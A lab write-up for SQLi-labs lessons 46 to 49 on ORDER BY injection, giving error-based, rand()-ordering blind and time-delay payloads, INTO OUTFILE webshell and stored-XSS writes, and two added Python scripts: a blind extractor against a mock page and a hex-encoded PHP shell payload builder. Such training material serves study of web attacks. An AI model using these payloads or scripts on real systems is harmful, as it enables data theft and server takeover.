SQLi-labs: Lesson 46

The error-based payloads from Lesson 17 work here: the sort parameter is placed directly into the ORDER BY clause without quoting, so a whole expression can be injected as the sort key.

Query 1: ?sort=(select count(column_name) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))#

Result 1:

Duplicate entry '::root@localhost::0' for key 'group_key'

Query 2: ?sort=(select 1 from (select count(*),concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c,floor(rand()*2))a from information_schema.tables group by a)b)#

Result 2:

Duplicate entry '\id,username,password\1' for key 'group_key'

Blind Injection

Boolean-blind via left(), right() and rand(). MySQL's rand(N) is seeded, so ORDER BY rand(1) and ORDER BY rand(0) return the rows in two different but repeatable orders. A condition placed inside rand() evaluates to 1 or 0 and therefore selects one of those two orders, which leaks its truth value through the row order on the page.

Calibrate first with ?sort=rand(1) and ?sort=rand(0), then compare the page for each of the following against those two baselines (the three forms on each line are equivalent):

  • ?sort=rand(ascii(left(database(),1))=115) OR ?sort=rand(left(database(),1)='s') OR ?sort=rand(ascii(left(database(),1))=ascii('s'))
  • ?sort=rand(ascii(right(database(),1))=121) OR ?sort=rand(right(database(),1)='y') OR ?sort=rand(ascii(right(database(),1))=ascii('y'))
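The extraction loop that the rand(true/false) ordering oracle enables, for this lesson and for the Lesson 48 queries below, as an added example that is not part of the original write-up. fetch_page() is a constructed stand-in for GET /Less-46/?sort=...: it models only the one fact the technique relies on, that rand(1) and rand(0) give two different but repeatable row orders, and the table rows and the database name "security" in it are made up for the mock. Swap fetch_page() for a real HTTP request to run it against the lab; the calibration and binary search are unchanged.

```python
"""Boolean-blind extraction through ORDER BY rand(<condition>) (Less-46/Less-48).

Added example, not from the write-up. fetch_page() is a mock of the lab page.
"""
import re

# Constructed stand-in for the lab's `users` table (not the real lab rows).
ROWS = [(1, "Dumb"), (2, "Angelina"), (3, "Dummy"), (4, "secure")]
MOCK_DATABASE = "security"  # what database() returns in the mock

PROBE = re.compile(r"rand\(ascii\(substr\(database\(\),(\d+),1\)\)<(\d+)\)")


def _rows_ordered_by_rand(seed):
    # Two fixed, distinct permutations standing in for ORDER BY rand(1) / rand(0).
    return ROWS[::-1] if seed else ROWS[1::2] + ROWS[0::2]


def fetch_page(sort):
    """Mock server. Accepts ?sort=rand(0), ?sort=rand(1) and the probe shape
    rand(ascii(substr(database(),N,1))<V); returns the rendered table body."""
    m = re.fullmatch(r"rand\(([01])\)", sort)
    if m:
        seed = int(m.group(1))
    else:
        m = PROBE.fullmatch(sort)
        if not m:
            raise ValueError("mock understands only rand(0|1) and the probe shape")
        pos, val = int(m.group(1)), int(m.group(2))
        # MySQL: substr() past the end is '' and ascii('') is 0.
        ch = ord(MOCK_DATABASE[pos - 1]) if pos <= len(MOCK_DATABASE) else 0
        seed = int(ch < val)  # rand(<cond>) becomes rand(1) or rand(0)
    return "\n".join(f"{i} {name}" for i, name in _rows_ordered_by_rand(seed))


def truth_of(sort, true_page, false_page):
    """Map a response to a boolean by comparing it with the two baselines.
    Anything else means the ordering oracle is misbehaving; stop rather than
    silently extracting garbage."""
    page = fetch_page(sort)
    if page == true_page:
        return True
    if page == false_page:
        return False
    raise RuntimeError(f"response for {sort!r} matched neither baseline")


def extract_database(max_len=64):
    """Recover database() one byte at a time with a binary search over 0..127
    (7 requests per character instead of up to 127 equality probes)."""
    # Calibration: what the page looks like when the condition is true / false.
    true_page = fetch_page("rand(1)")
    false_page = fetch_page("rand(0)")
    if true_page == false_page:
        raise RuntimeError("rand(1) and rand(0) give the same order; oracle unusable")

    name = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 128  # invariant: lo <= byte < hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            probe = f"rand(ascii(substr(database(),{pos},1))<{mid})"
            if truth_of(probe, true_page, false_page):
                hi = mid
            else:
                lo = mid
        if lo == 0:  # ascii('') == 0: ran past the end of the string
            break
        name += chr(lo)
    return name


if __name__ == "__main__":
    print(extract_database())
```

Against the real lab, compare only the stable part of the response (the rendered rows), not the whole HTML, and keep the "matched neither baseline" check: it is what tells you the order was disturbed by something other than your condition.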

Time Delay Injection (as in Lessons 9 and 10)

  • ?sort= (SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)--+
  • ?sort=if(substr(version(),1,1)=5, sleep(3),null)--+
  • ?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(5))--+

Procedure Analyse

Reference: here

It seems my database version cannot use this method as referenced. PROCEDURE ANALYSE() was removed in MySQL 8.0, and on this server the parser rejects a function call as its argument, which is what the error below shows.

Error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'extractvalue(rand(),concat(0x3a,version())),1)' at line 1

Upload Webshell via Outfile

?sort=1 into outfile "/var/www/html/sqli/Less-46/1.txt" lines terminated by (your webshell here)

This needs the FILE privilege on the database account, secure_file_priv set to '' (or to a directory that contains the target path), a target path that does not exist yet and is writable by the mysqld user, and a web server that shares the filesystem with MySQL so the written file is reachable over HTTP. The web-root path has to be known or guessed; the one above is the lab's default layout.

Stored XSS through the same primitive, by writing an HTML file into the web root: ?sort=1 into outfile "/var/www/html/sqli/Less-46/1.html" lines terminated by '<script>alert(123)</script>'


SQLi-labs: Lesson 47

Error based - single quote.

Blind injection via the rand() trick is not reliable here: the sort parameter sits inside single quotes in the ORDER BY clause, so the Lesson 46 payloads do not work as-is. Other methods are needed.

The queries from Lesson 17 work here.

Time Delay Injection also works: ?sort=1' and if(substr(version(),1,1)=5, sleep(3),null)--+

Webshell

?sort=1' into outfile "/var/www/html/sqli/Less-47/1.php" lines terminated by '<?php phpinfo();?>'--+

Or, with the shell as a hex literal (no quotes of any kind needed inside the payload):

?sort=1' into outfile "/var/www/html/sqli/Less-47/1.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

Requesting 1.php then runs phpinfo(), which dumps the PHP configuration; any other PHP body can be written the same way.
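A small builder for the INTO OUTFILE payloads of this lesson and of the Lesson 46 section above, as an added example that is not part of the original write-up. It shows why the hex form of the shell is convenient and how the two contexts differ: Lesson 46 puts the sort parameter straight into ORDER BY, Lesson 47 wraps it in single quotes, so the quoted form has to close the quote and comment out the trailing one. The host and file paths in the usage call are placeholders; the hex literal it produces for the phpinfo shell is the one shown above.

```python
"""Build INTO OUTFILE payloads for the ORDER BY injection in Less-46 and Less-47.

Added example, not from the write-up.
"""
from urllib.parse import quote


def hex_literal(data):
    """MySQL hex literal (0x...) for str or bytes. In string context MySQL
    treats it as the decoded string, so it replaces '<?php ...?>' without
    any quote characters that the surrounding query could choke on."""
    if isinstance(data, str):
        data = data.encode()
    return "0x" + data.hex()


def outfile_payload(path, shell, quoted=False):
    """The ?sort= value that makes the query write `shell` into `path`.

    Preconditions on the target (not checked here): the DB account has FILE,
    secure_file_priv is '' or a directory containing `path`, `path` does not
    exist yet and is writable by the mysqld user, and the web server shares the
    filesystem with MySQL so the file lands under the web root.
    """
    if quoted:  # Less-47/49: ORDER BY '$sort' -> close the quote, comment the rest
        return (f"1' into outfile \"{path}\" lines terminated by "
                f"{hex_literal(shell)}--+")
    # Less-46/48: ORDER BY $sort -> nothing to close; the statement simply ends
    return f'1 into outfile "{path}" lines terminated by {hex_literal(shell)}'


def sort_url(base, payload):
    """Percent-encode the payload except '+', which the server decodes to the
    trailing space that the '-- ' comment needs."""
    return f"{base}?sort={quote(payload, safe='/+')}"


if __name__ == "__main__":
    shell = "<?php phpinfo();?>  "
    print(outfile_payload("/var/www/html/sqli/Less-46/1.php", shell))
    print(sort_url("http://127.0.0.1/sqli/Less-47/",
                   outfile_payload("/var/www/html/sqli/Less-47/1.php", shell, quoted=True)))
```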


SQLi-labs: Lesson 48

Blind, numeric: the sort parameter is unquoted as in Lesson 46, but no database errors are shown.

Using the rand(true/false) ordering oracle:

  • ?sort=rand(ascii(left(database(),1))=115)--+
  • ?sort=rand(left(database(),8)='security')--+

Time-delay injection and INTO OUTFILE (webshell) injection also work.


SQLi-labs: Lesson 49

Blind based - single quote.

Similar to the previous lessons: single-quoted like Lesson 47, with no error output like Lesson 48.

Time Delay

?sort=1' and if(substr(version(),1,1)=5, sleep(3),null)--+

INTO OUTFILE (webshell) injection also works.
